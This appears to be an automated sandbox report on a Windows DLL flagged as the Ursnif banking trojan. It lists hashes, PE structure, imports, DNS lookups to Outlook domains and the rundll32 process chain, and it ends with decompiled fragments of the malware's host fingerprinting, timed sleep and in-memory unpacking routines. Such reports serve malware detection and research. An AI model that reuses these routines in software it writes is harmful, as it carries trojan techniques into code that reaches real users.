              General

              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.324532607203666
              TrID:
              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
              • Generic Win/DOS Executable (2004/3) 0.20%
              • DOS Executable Generic (2002/1) 0.20%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:kZcCqvNtWa.dll
              File size:478720
              MD5:b9b732dbc6f94c79b5767eb98ebd899a
              SHA1:984a3ba5d4fe06265ce23cec82bda6a63b2bb3bc
              SHA256:1a0d4b328438a72cee012f6387825d942463b896fadc13f2c17e8d005f510cd4
              SHA512:595b4429e9f13212740ac4f9e12282dc3fdf9e141041695e4fe6302acf7aac2527275cb6a98eec78049758972c946cc62971604f68f7de68ad2350d13bac497a
              SSDEEP:12288:4Z31u8+a95+CA9lROexw8P7CbxXTTbWA:4Z31P9wr9lROow8W/

              File Icon

              Icon Hash:74f0e4ecccdce0e4

              Static PE Info

              General

              Entrypoint:0x1041953
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x1000000
              Subsystem:windows gui
              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              DLL Characteristics:DYNAMIC_BASE
              Time Stamp:0x608B79B0 [Fri Apr 30 03:29:52 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:0
              File Version Major:5
              File Version Minor:0
              Subsystem Version Major:5
              Subsystem Version Minor:0
              Import Hash:a2f0d616525ae6c643810961c7d4fdfe

              Entrypoint Preview

              Instruction
              mov edi, edi
              push ebp
              mov ebp, esp
              cmp dword ptr [ebp+0Ch], 01h
              jne 00007FEB209FAF67h
              call 00007FEB209FF8CCh
              push dword ptr [ebp+08h]
              mov ecx, dword ptr [ebp+10h]
              mov edx, dword ptr [ebp+0Ch]
              call 00007FEB209FAE51h
              pop ecx
              pop ebp
              retn 000Ch
              mov edi, edi
              push ebp
              mov ebp, esp
              mov eax, dword ptr [ebp+08h]
              xor ecx, ecx
              cmp eax, dword ptr [01073618h+ecx*8]
              je 00007FEB209FAF75h
              inc ecx
              cmp ecx, 2Dh
              jc 00007FEB209FAF53h
              lea ecx, dword ptr [eax-13h]
              cmp ecx, 11h
              jnbe 00007FEB209FAF70h
              push 0000000Dh
              pop eax
              pop ebp
              ret
              mov eax, dword ptr [0107361Ch+ecx*8]
              pop ebp
              ret
              add eax, FFFFFF44h
              push 0000000Eh
              pop ecx
              cmp ecx, eax
              sbb eax, eax
              and eax, ecx
              add eax, 08h
              pop ebp
              ret
              call 00007FEB209FC836h
              test eax, eax
              jne 00007FEB209FAF68h
              mov eax, 01073780h
              ret
              add eax, 08h
              ret
              mov edi, edi
              push ebp
              mov ebp, esp
              mov eax, dword ptr [ebp+08h]
              mov dword ptr [0108B5ACh], eax
              pop ebp
              ret
              mov edi, edi
              push ebp
              mov ebp, esp
              push dword ptr [0108B5ACh]
              call 00007FEB209FC636h
              pop ecx
              test eax, eax
              je 00007FEB209FAF71h
              push dword ptr [ebp+08h]
              call eax
              pop ecx
              test eax, eax
              je 00007FEB209FAF67h
              xor eax, eax
              inc eax
              pop ebp
              ret
              xor eax, eax
              pop ebp
              ret
              mov edi, edi
              push esi
              push edi
              xor esi, esi
              mov edi, 0108B5B8h
              cmp dword ptr [0107378Ch+esi*8], 01h
              jne 00007FEB209FAF80h
              lea eax, dword ptr [00000088h+esi*8]

              Rich Headers

              Programming Language:
              • [ C ] VS2008 build 21022
              • [LNK] VS2008 build 21022
              • [ C ] VS2005 build 50727
              • [ASM] VS2008 build 21022
              • [IMP] VS2005 build 50727
              • [RES] VS2008 build 21022
              • [C++] VS2008 build 21022
              • [IMP] VS2008 build 21022
              • [EXP] VS2008 build 21022

              Data Directories

              | Name | Virtual Address | Virtual Size | Is in Section |
              |---|---|---|---|
              | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x72630 | 0x6f | .rdata |
              | IMAGE_DIRECTORY_ENTRY_IMPORT | 0x71e64 | 0x50 | .rdata |
              | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8d000 | 0x3bc | .rsrc |
              | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8e000 | 0x1544 | .reloc |
              | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x49190 | 0x1c | .rdata |
              | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x70c08 | 0x40 | .rdata |
              | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_IAT | 0x49000 | 0x15c | .rdata |
              | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
              | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

              Sections

              | Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
              |---|---|---|---|---|---|---|---|---|
              | .text | 0x1000 | 0x4732e | 0x47400 | False | 0.745877878289 | data | 6.57407814817 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
              | .rdata | 0x49000 | 0x2969f | 0x29800 | False | 0.65666768637 | data | 5.42368765721 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
              | .data | 0x73000 | 0x1917c | 0x1400 | False | 0.2435546875 | data | 3.63177828336 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
              | .rsrc | 0x8d000 | 0x3bc | 0x400 | False | 0.4091796875 | data | 3.09285651514 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
              | .reloc | 0x8e000 | 0x2588 | 0x2600 | False | 0.456106085526 | data | 4.61056666922 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

              Resources

              | Name | RVA | Size | Type | Language | Country |
              |---|---|---|---|---|---|
              | RT_VERSION | 0x8d058 | 0x364 | data | English | United States |

              Imports

              | DLL | Import |
              |---|---|
              | KERNEL32.dll | QueryPerformanceCounter, GetVolumeInformationW, GetSystemTime, GetModuleHandleW, GetVersionExW, OpenProcess, GetDateFormatW, FindResourceW, LockResource, GetLocalTime, HeapCreate, CreateFileW, HeapFree, HeapCompact, HeapAlloc, VirtualProtectEx, GetCurrentDirectoryW, SetConsoleCP, SetConsoleOutputCP, GetStringTypeW, GetStringTypeA, GetLocaleInfoA, LoadLibraryA, GetLastError, HeapReAlloc, RtlUnwind, GetCurrentThreadId, GetCommandLineA, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapDestroy, VirtualFree, VirtualAlloc, Sleep, GetProcAddress, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, RaiseException, HeapSize, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount |
              | ole32.dll | CoCreateInstance, CoUninitialize, OleInitialize, OleUninitialize, CoInitialize |
              | WINSPOOL.DRV | EnumPrintersW, GetPrinterDataW, GetPrinterW, DocumentPropertiesW, OpenPrinterW, ClosePrinter |

              Exports

              | Name | Ordinal | Address |
              |---|---|---|
              | Eithernothing | 1 | 0x103a020 |
              | Order | 2 | 0x1039f40 |
              | Smileschool | 3 | 0x1039b20 |

              Version Infos

              DescriptionData
              LegalCopyright Notice sister Corporation. All rights reserved
              InternalNameSlow
              FileVersion3.2.1.380
              CompanyNameNotice sister Corporation
              ProductNameNotice sister Soil read
              Observe38
              ProductVersion3.2.1
              FileDescriptionNotice sister Soil read Skinneed
              OriginalFilenameTail.dll
              Translation0x0409 0x04b0

              Possible Origin

              | Language of compilation system | Country where language is spoken |
              |---|---|
              | English | United States |

              Network Behavior

              Network Port Distribution

              UDP Packets


              DNS Queries

              | Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
              |---|---|---|---|---|---|---|---|
              | May 12, 2021 13:03:34.283544064 CEST | 192.168.2.3 | 8.8.8.8 | 0x5e15 | Standard query (0) | outlook.com | A (IP address) | IN (0x0001) |
              | May 12, 2021 13:03:35.099181890 CEST | 192.168.2.3 | 8.8.8.8 | 0x73b8 | Standard query (0) | www.outlook.com | A (IP address) | IN (0x0001) |
              | May 12, 2021 13:03:35.310314894 CEST | 192.168.2.3 | 8.8.8.8 | 0x79a2 | Standard query (0) | outlook.office365.com | A (IP address) | IN (0x0001) |

              DNS Answers


              Code Manipulations

              System Behavior

              General

              Start time:13:01:30
              Start date:12/05/2021
              Path:C:\Windows\System32\loaddll32.exe
              Wow64 process (32bit):true
              Commandline:loaddll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll'
              Imagebase:0x1210000
              File size:116736 bytes
              MD5 hash:542795ADF7CC08EFCF675D65310596E8
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp, Author: Joe Security
              Reputation:high

              General

              Start time:13:01:32
              Start date:12/05/2021
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1
              Imagebase:0xbd0000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:13:01:32
              Start date:12/05/2021
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Eithernothing
              Imagebase:0x1310000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:13:01:32
              Start date:12/05/2021
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1
              Imagebase:0x1310000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:13:01:36
              Start date:12/05/2021
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Order
              Imagebase:0x1310000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:13:01:40
              Start date:12/05/2021
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Smileschool
              Imagebase:0x1310000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:13:03:32
              Start date:12/05/2021
              Path:C:\Program Files\internet explorer\iexplore.exe
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Imagebase:0x7ff62b4d0000
              File size:823560 bytes
              MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:13:03:33
              Start date:12/05/2021
              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1492 CREDAT:17410 /prefetch:2
              Imagebase:0x1360000
              File size:822536 bytes
              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Code Analysis

                Executed Functions

                C-Code - Quality: 93%
                			E001D4C3B(signed char* __eax, intOrPtr* _a4) {
                				signed int _v12;
                				void* _v16;
                				CHAR* _v20;
                				struct _FILETIME _v28;
                				void* _v32;
                				void* _v36;
                				char* _v40;
                				signed int _v44;
                				long _v344;
                				struct _WIN32_FIND_DATAA _v368;
                				signed int _t72;
                				void* _t74;
                				signed int _t76;
                				void* _t78;
                				intOrPtr _t81;
                				CHAR* _t83;
                				void* _t85;
                				signed char _t89;
                				signed char _t91;
                				intOrPtr _t93;
                				void* _t96;
                				long _t99;
                				int _t101;
                				signed int _t109;
                				char* _t111;
                				void* _t113;
                				int _t119;
                				char _t128;
                				void* _t134;
                				signed int _t136;
                				char* _t139;
                				signed int _t140;
                				char* _t141;
                				char* _t146;
                				signed char* _t148;
                				int _t151;
                				void* _t152;
                				void* _t153;
                				void* _t154;
                				void* _t165;
                
                				_v12 = _v12 & 0x00000000;
                				_t148 = __eax;
                				_t72 =  *0x1dd2a0; // 0x63699bc3
                				_t74 = RtlAllocateHeap( *0x1dd238, 0, _t72 ^ 0x63699ac7);
                				_v20 = _t74;
                				if(_t74 == 0) {
                					L36:
                					return _v12;
                				}
                				_t76 =  *0x1dd2a0; // 0x63699bc3
                				_t78 = RtlAllocateHeap( *0x1dd238, 0, _t76 ^ 0x63699bce);
                				_t146 = 0;
                				_v36 = _t78;
                				if(_t78 == 0) {
                					L35:
                					HeapFree( *0x1dd238, _t146, _v20);
                					goto L36;
                				}
                				_t136 =  *0x1dd2a0; // 0x63699bc3
                				memset(_t78, 0, _t136 ^ 0x63699bce);
                				_t81 =  *0x1dd2a4; // 0x2dca5a8
                				_t154 = _t153 + 0xc;
                				_t5 = _t81 + 0x1de7f2; // 0x73797325
                				_t83 = E001D903C(_t5);
                				_v20 = _t83;
                				if(_t83 == 0) {
                					L34:
                					HeapFree( *0x1dd238, _t146, _v36);
                					goto L35;
                				}
                				_t134 = 0xffffffffffffffff;
                				_v28.dwLowDateTime = 0x63699bce;
                				_v28.dwHighDateTime = 0x63699bce;
                				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                				_v32 = _t85;
                				if(_t85 != 0x63699bce) {
                					GetFileTime(_t85,  &_v28, 0, 0);
                					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                					asm("adc dword [ebp-0x14], 0xc9");
                					CloseHandle(_v32);
                				}
                				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                				 *_t148 = _t91;
                				_v32 = _t91 & 0x000000ff;
                				_t93 =  *0x1dd2a4; // 0x2dca5a8
                				_t16 = _t93 + 0x1de813; // 0x642e2a5c
                				_v40 = _t146;
                				_v44 = _t89 & 0x000000ff;
                				__imp__(_v20, _t16);
                				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                				_v16 = _t96;
                				if(_t96 == _t134) {
                					_t146 = 0;
                					goto L34;
                				}
                				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                				while(_t99 > 0) {
                					_t101 = FindNextFileA(_v16,  &_v368); // executed
                					if(_t101 == 0) {
                						FindClose(_v16);
                						_v16 = FindFirstFileA(_v20,  &_v368);
                						_v28.dwHighDateTime = _v344;
                						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                					}
                					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                				}
                				_v12 = _v12 & 0x00000000;
                				while(1) {
                					_t109 = _v44;
                					if(_v12 <= _t109) {
                						goto L15;
                					}
                					_t140 = _v12;
                					if(_t140 > _v32) {
                						_t141 = _v36;
                						 *_a4 = _t141;
                						while(1) {
                							_t128 =  *_t141;
                							if(_t128 == 0) {
                								break;
                							}
                							if(_t128 < 0x30) {
                								 *_t141 = _t128 + 0x20;
                							}
                							_t141 = _t141 + 1;
                						}
                						_v12 = 1;
                						FindClose(_v16); // executed
                						_t146 = 0;
                						goto L35;
                					}
                					_t165 = _t140 - _t109;
                					L15:
                					if(_t165 == 0 || _v12 == _v32) {
                						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                						_t139 = _v40;
                						_t151 = _t111 -  &(_v368.cFileName);
                						_t113 = 0;
                						if(_t139 != 0) {
                							_t48 = _t151 - 4; // -4
                							_t113 = _t48;
                							if(_t113 > _t151) {
                								_t113 = 0;
                							}
                						}
                						if(_t151 > 4) {
                							_t151 = 4;
                						}
                						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                						_t154 = _t154 + 0xc;
                						_v40 =  &(_v40[_t151]);
                					}
                					do {
                						_t119 = FindNextFileA(_v16,  &_v368); // executed
                						if(_t119 == 0) {
                							FindClose(_v16);
                							_v16 = FindFirstFileA(_v20,  &_v368);
                						}
                					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                					_v12 = _v12 + 1;
                				}
                			}

                APIs
                • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 001D4C66
                • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 001D4C88
                • memset.NTDLL ref: 001D4CA2
                  • Part of subcall function 001D903C: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,001D5D90,63699BCE,001D4CBB,73797325), ref: 001D904D
                  • Part of subcall function 001D903C: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 001D9067
                • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 001D4CE0
                • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D4CF4
                • CloseHandle.KERNEL32(00000000), ref: 001D4D0B
                • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 001D4D17
                • lstrcat.KERNEL32(?,642E2A5C), ref: 001D4D58
                • FindFirstFileA.KERNELBASE(?,?), ref: 001D4D6E
                • CompareFileTime.KERNEL32(?,?), ref: 001D4D8C
                • FindNextFileA.KERNELBASE(001D41AA,?), ref: 001D4DA0
                • FindClose.KERNEL32(001D41AA), ref: 001D4DAD
                • FindFirstFileA.KERNEL32(?,?), ref: 001D4DB9
                • CompareFileTime.KERNEL32(?,?), ref: 001D4DDB
                • StrChrA.SHLWAPI(?,0000002E), ref: 001D4E0E
                • memcpy.NTDLL(00000000,?,00000000), ref: 001D4E47
                • FindNextFileA.KERNELBASE(001D41AA,?), ref: 001D4E5C
                • FindClose.KERNEL32(001D41AA), ref: 001D4E69
                • FindFirstFileA.KERNEL32(?,?), ref: 001D4E75
                • CompareFileTime.KERNEL32(?,?), ref: 001D4E85
                • FindClose.KERNELBASE(001D41AA), ref: 001D4EBA
                • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 001D4ECC
                • HeapFree.KERNEL32(00000000,?), ref: 001D4EDC
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
                • String ID:
                • API String ID: 455834338-0
                • Opcode ID: 7d9e03a70373fbb937039ca07a1922f3611422dbacf0ff1fcb2fbcb6d67d9ea0
                • Instruction ID: 668ec5cb1c64ed30e12102b5bc5826309b4203029f91ba743336290b352de6b5
                • Opcode Fuzzy Hash: 7d9e03a70373fbb937039ca07a1922f3611422dbacf0ff1fcb2fbcb6d67d9ea0
                • Instruction Fuzzy Hash: B081397290121AEFDF119FA9DC84AEEBBB9FF54300F10056BE505E6260D7759A84CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E6E241237(char _a4) {
                				long _v8;
                				struct _SYSTEMTIME _v24;
                				char _v48;
                				void* __edi;
                				long _t20;
                				int _t22;
                				long _t25;
                				long _t26;
                				long _t30;
                				void* _t36;
                				intOrPtr _t38;
                				intOrPtr _t43;
                				signed int _t44;
                				void* _t48;
                				signed int _t51;
                				void* _t54;
                				intOrPtr* _t55;
                
                				_t20 = E6E241CDD();
                				_v8 = _t20;
                				if(_t20 != 0) {
                					return _t20;
                				}
                				do {
                					GetSystemTime( &_v24);
                					_t22 = SwitchToThread();
                					asm("cdq");
                					_t44 = 9;
                					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
                					_t25 = E6E2410E8(0, _t51); // executed
                					_v8 = _t25;
                					Sleep(_t51 << 5); // executed
                					_t26 = _v8;
                				} while (_t26 == 0xc);
                				if(_t26 != 0) {
                					L18:
                					return _t26;
                				}
                				if(_a4 != 0) {
                					L11:
                					_push(0);
                					_t54 = E6E24179C(E6E241424,  &_v48);
                					if(_t54 == 0) {
                						_v8 = GetLastError();
                					} else {
                						_t30 = WaitForSingleObject(_t54, 0xffffffff);
                						_v8 = _t30;
                						if(_t30 == 0) {
                							GetExitCodeThread(_t54,  &_v8);
                						}
                						CloseHandle(_t54);
                					}
                					_t26 = _v8;
                					if(_t26 == 0xffffffff) {
                						_t26 = GetLastError();
                					}
                					goto L18;
                				}
                				if(E6E241BE5(_t44,  &_a4) != 0) {
                					 *0x6e244138 = 0;
                					goto L11;
                				}
                				_t43 = _a4;
                				_t55 = __imp__GetLongPathNameW;
                				_t36 =  *_t55(_t43, 0, 0); // executed
                				_t48 = _t36;
                				if(_t48 == 0) {
                					L9:
                					 *0x6e244138 = _t43;
                					goto L11;
                				}
                				_t14 = _t48 + 2; // 0x2
                				_t38 = E6E241CC8(_t48 + _t14);
                				 *0x6e244138 = _t38;
                				if(_t38 == 0) {
                					goto L9;
                				}
                				 *_t55(_t43, _t38, _t48); // executed
                				E6E24133D(_t43);
                				goto L11;
                			}

                APIs
                  • Part of subcall function 6E241CDD: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E241243,74B063F0), ref: 6E241CEC
                  • Part of subcall function 6E241CDD: GetVersion.KERNEL32 ref: 6E241CFB
                  • Part of subcall function 6E241CDD: GetCurrentProcessId.KERNEL32 ref: 6E241D17
                  • Part of subcall function 6E241CDD: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E241D30
                • GetSystemTime.KERNEL32(?,00000000,74B063F0), ref: 6E241255
                • SwitchToThread.KERNEL32 ref: 6E24125B
                  • Part of subcall function 6E2410E8: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E24113E
                  • Part of subcall function 6E2410E8: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E241204
                • Sleep.KERNELBASE(00000000,00000000), ref: 6E24127C
                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E2412B1
                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E2412CF
                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E241307
                • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E241319
                • CloseHandle.KERNEL32(00000000), ref: 6E241320
                • GetLastError.KERNEL32(?,00000000), ref: 6E241328
                • GetLastError.KERNEL32 ref: 6E241335
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
                • String ID:
                • API String ID: 1962885430-0
                • Opcode ID: 189d7c23854f3341d627936f60fcac966e4c98c595be1abc70c197ddd2040fa7
                • Instruction ID: 5278bee4b763a206ff5b07ea8e44d17f497be1635948ba19cd1fe828555df728
                • Opcode Fuzzy Hash: 189d7c23854f3341d627936f60fcac966e4c98c595be1abc70c197ddd2040fa7
                • Instruction Fuzzy Hash: BF31B675800A2DEBDB09EBE5CC48D9E7ABFEB86325B100512E911E3140E770CA98CB70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualAlloc.KERNELBASE(00000000,000007D1,00003000,00000040,000007D1,6E2B51C8), ref: 6E2B582D
                • VirtualAlloc.KERNEL32(00000000,00000059,00003000,00000040,6E2B5229), ref: 6E2B5864
                • VirtualAlloc.KERNEL32(00000000,00016DD9,00003000,00000040), ref: 6E2B58C4
                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2B58FA
                • VirtualProtect.KERNEL32(6E240000,00000000,00000004,6E2B574F), ref: 6E2B59FF
                • VirtualProtect.KERNEL32(6E240000,00001000,00000004,6E2B574F), ref: 6E2B5A26
                • VirtualProtect.KERNEL32(00000000,?,00000002,6E2B574F), ref: 6E2B5AF3
                • VirtualProtect.KERNEL32(00000000,?,00000002,6E2B574F,?), ref: 6E2B5B49
                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2B5B65
                Memory Dump Source
                • Source File: 00000000.00000002.480938016.000000006E2B5000.00000040.00020000.sdmp, Offset: 6E2B5000, based on PE: false
                Similarity
                • API ID: Virtual$Protect$Alloc$Free
                • String ID:
                • API String ID: 2574235972-0
                • Opcode ID: 25725fe3ea5edefb74e8182b314af060065adca4d4aa0626c8a3a422ebf314a2
                • Instruction ID: 6c745d1252552f361657073bcf2cc6166a8526736039d4674cf52b66e0d2632a
                • Opcode Fuzzy Hash: 25725fe3ea5edefb74e8182b314af060065adca4d4aa0626c8a3a422ebf314a2
                • Instruction Fuzzy Hash: 24D1BBB21446019FEB25CF44C8C0F51B7B7FF58318B096198ED8D9F65ADB70A820CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E001D2D6E(char __eax, void* __esi) {
                				long _v8;
                				char _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v28;
                				long _t34;
                				signed int _t39;
                				long _t50;
                				char _t59;
                				intOrPtr _t61;
                				void* _t62;
                				void* _t64;
                				char _t65;
                				intOrPtr* _t67;
                				void* _t68;
                				void* _t69;
                
                				_t69 = __esi;
                				_t65 = __eax;
                				_v8 = 0;
                				_v12 = __eax;
                				if(__eax == 0) {
                					_t59 =  *0x1dd270; // 0xd448b889
                					_v12 = _t59;
                				}
                				_t64 = _t69;
                				E001D427C( &_v12, _t64);
                				if(_t65 != 0) {
                					 *_t69 =  *_t69 ^  *0x1dd2a0 ^ 0x4c0ca0ae;
                				} else {
                					GetUserNameW(0,  &_v8); // executed
                					_t50 = _v8;
                					if(_t50 != 0) {
                						_t62 = RtlAllocateHeap( *0x1dd238, 0, _t50 + _t50);
                						if(_t62 != 0) {
                							if(GetUserNameW(_t62,  &_v8) != 0) {
                								_t64 = _t62;
                								 *_t69 =  *_t69 ^ E001D46F9(_v8 + _v8, _t64);
                							}
                							HeapFree( *0x1dd238, 0, _t62);
                						}
                					}
                				}
                				_t61 = __imp__;
                				_v8 = _v8 & 0x00000000;
                				GetComputerNameW(0,  &_v8);
                				_t34 = _v8;
                				if(_t34 != 0) {
                					_t68 = RtlAllocateHeap( *0x1dd238, 0, _t34 + _t34);
                					if(_t68 != 0) {
                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                							_t64 = _t68;
                							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E001D46F9(_v8 + _v8, _t64);
                						}
                						HeapFree( *0x1dd238, 0, _t68);
                					}
                				}
                				asm("cpuid");
                				_t67 =  &_v28;
                				 *_t67 = 1;
                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                				 *((intOrPtr*)(_t67 + 8)) = 0;
                				 *(_t67 + 0xc) = _t64;
                				_t39 = _v16 ^ _v20 ^ _v28;
                				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                				return _t39;
                			}

                APIs
